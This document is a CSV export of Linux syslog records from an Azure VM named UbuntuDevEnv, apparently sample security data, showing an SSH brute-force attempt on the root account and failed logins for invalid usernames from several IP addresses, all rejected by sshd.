+14042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:55,UbuntuDevEnv,2019-06-26 04:51:54,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 12578 ssh2],2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12578,,
+14043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:55,UbuntuDevEnv,2019-06-26 04:51:54,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:58,UbuntuDevEnv,2019-06-26 04:51:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:59,UbuntuDevEnv,2019-06-26 04:51:59,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 18244 ssh2,2162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18244,,
+14046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:02,UbuntuDevEnv,2019-06-26 04:52:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 18244 ssh2,2162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18244,,
+14047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:12,UbuntuDevEnv,2019-06-26 04:52:11,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 18244: Too many authentication failures [preauth],2162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,18244,,
+14048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:12,UbuntuDevEnv,2019-06-26 04:52:11,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 18244 ssh2 [preauth],2162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18244,,
+14049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:12,UbuntuDevEnv,2019-06-26 04:52:11,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 18244 ssh2],2162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,18244,,
+14050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:12,UbuntuDevEnv,2019-06-26 04:52:11,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:12,UbuntuDevEnv,2019-06-26 04:52:11,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:14,UbuntuDevEnv,2019-06-26 04:52:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:16,UbuntuDevEnv,2019-06-26 04:52:16,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 23769 ssh2,2231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,23769,,
+14054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:30,UbuntuDevEnv,2019-06-26 04:52:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:30,UbuntuDevEnv,2019-06-26 04:52:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:30,UbuntuDevEnv,2019-06-26 04:52:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 23769 ssh2 [preauth],2231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,23769,,
+14057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:30,UbuntuDevEnv,2019-06-26 04:52:29,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 23769 ssh2],2231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,23769,,
+14058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:30,UbuntuDevEnv,2019-06-26 04:52:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 23769: Too many authentication failures [preauth],2231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,23769,,
+14059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:31,UbuntuDevEnv,2019-06-26 04:52:31,auth,UbuntuDevEnv,info,Invalid user minecraft from 119.123.240.8 port 36986,2273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,119.123.240.8,36986,,
+14060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:31,UbuntuDevEnv,2019-06-26 04:52:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:31,UbuntuDevEnv,2019-06-26 04:52:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,2273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+14062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:32,UbuntuDevEnv,2019-06-26 04:52:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:33,UbuntuDevEnv,2019-06-26 04:52:32,auth,UbuntuDevEnv,info,Failed password for invalid user minecraft from 119.123.240.8 port 36986 ssh2,2273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,119.123.240.8,36986,,
+14064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:33,UbuntuDevEnv,2019-06-26 04:52:33,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 36986:11: Bye Bye [preauth],2273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,36986,,
+14065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:33,UbuntuDevEnv,2019-06-26 04:52:33,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 119.123.240.8 port 36986 [preauth],2273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,119.123.240.8,36986,,
+14066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:34,UbuntuDevEnv,2019-06-26 04:52:34,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29299 ssh2,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29299,,
+14067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:37,UbuntuDevEnv,2019-06-26 04:52:36,auth,UbuntuDevEnv,info,Invalid user chuo from 196.41.208.238 port 29481,2311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chuo,196.41.208.2,29481,,
+14068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:37,UbuntuDevEnv,2019-06-26 04:52:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:37,UbuntuDevEnv,2019-06-26 04:52:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,2311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:37,UbuntuDevEnv,2019-06-26 04:52:37,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29299 ssh2,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29299,,
+14071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:39,UbuntuDevEnv,2019-06-26 04:52:39,auth,UbuntuDevEnv,info,Failed password for invalid user chuo from 196.41.208.238 port 29481 ssh2,2311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chuo,196.41.208.2,29481,,
+14072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:39,UbuntuDevEnv,2019-06-26 04:52:39,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 29481:11: Bye Bye [preauth],2311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,29481,,
+14073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:39,UbuntuDevEnv,2019-06-26 04:52:39,auth,UbuntuDevEnv,info,Disconnected from invalid user chuo 196.41.208.238 port 29481 [preauth],2311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chuo,196.41.208.2,29481,,
+14074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:39,UbuntuDevEnv,2019-06-26 04:52:39,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29299 ssh2,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29299,,
+14075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:42,UbuntuDevEnv,2019-06-26 04:52:42,auth,UbuntuDevEnv,info,Invalid user usbmux from 177.23.90.10 port 33638,2327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usbmux,177.23.90.1,33638,,
+14076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:42,UbuntuDevEnv,2019-06-26 04:52:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29299 ssh2,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29299,,
+14077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:42,UbuntuDevEnv,2019-06-26 04:52:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:42,UbuntuDevEnv,2019-06-26 04:52:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,2327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:44,UbuntuDevEnv,2019-06-26 04:52:44,auth,UbuntuDevEnv,info,Failed password for invalid user usbmux from 177.23.90.10 port 33638 ssh2,2327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usbmux,177.23.90.1,33638,,
+14080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:45,UbuntuDevEnv,2019-06-26 04:52:44,auth,UbuntuDevEnv,info,Disconnected from invalid user usbmux 177.23.90.10 port 33638 [preauth],2327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usbmux,177.23.90.1,33638,,
+14081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:45,UbuntuDevEnv,2019-06-26 04:52:44,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 33638:11: Bye Bye [preauth],2327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,33638,,
+14082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:45,UbuntuDevEnv,2019-06-26 04:52:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29299 ssh2,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29299,,
+14083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:47,UbuntuDevEnv,2019-06-26 04:52:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29299 ssh2,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29299,,
+14084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:47,UbuntuDevEnv,2019-06-26 04:52:47,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 29299 ssh2 [preauth],2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29299,,
+14085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:47,UbuntuDevEnv,2019-06-26 04:52:47,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 29299: Too many authentication failures [preauth],2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,29299,,
+14086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:47,UbuntuDevEnv,2019-06-26 04:52:47,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:47,UbuntuDevEnv,2019-06-26 04:52:47,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:50,UbuntuDevEnv,2019-06-26 04:52:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:51,UbuntuDevEnv,2019-06-26 04:52:51,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34743 ssh2,2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34743,,
+14090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:58,UbuntuDevEnv,2019-06-26 04:52:57,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 34743 ssh2],2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34743,,
+14091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:58,UbuntuDevEnv,2019-06-26 04:52:57,auth,UbuntuDevEnv,info,Invalid user sandrine from 5.135.161.72 port 34822,2393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandrine,5.135.161.7,34822,,
+14092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:58,UbuntuDevEnv,2019-06-26 04:52:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:52:58,UbuntuDevEnv,2019-06-26 04:52:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,2393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:00,UbuntuDevEnv,2019-06-26 04:52:59,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34743 ssh2,2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34743,,
+14095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:00,UbuntuDevEnv,2019-06-26 04:52:59,auth,UbuntuDevEnv,info,Failed password for invalid user sandrine from 5.135.161.72 port 34822 ssh2,2393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandrine,5.135.161.7,34822,,
+14096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:00,UbuntuDevEnv,2019-06-26 04:52:59,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 34822:11: Bye Bye [preauth],2393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,34822,,
+14097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:00,UbuntuDevEnv,2019-06-26 04:52:59,auth,UbuntuDevEnv,info,Disconnected from invalid user sandrine 5.135.161.72 port 34822 [preauth],2393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandrine,5.135.161.7,34822,,
+14098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:03,UbuntuDevEnv,2019-06-26 04:53:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34743 ssh2,2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34743,,
+14099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:05,UbuntuDevEnv,2019-06-26 04:53:04,auth,UbuntuDevEnv,info,Invalid user she from 95.216.195.95 port 58320,2414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,she,95.216.195.9,58320,,
+14100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:05,UbuntuDevEnv,2019-06-26 04:53:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:05,UbuntuDevEnv,2019-06-26 04:53:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,2414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
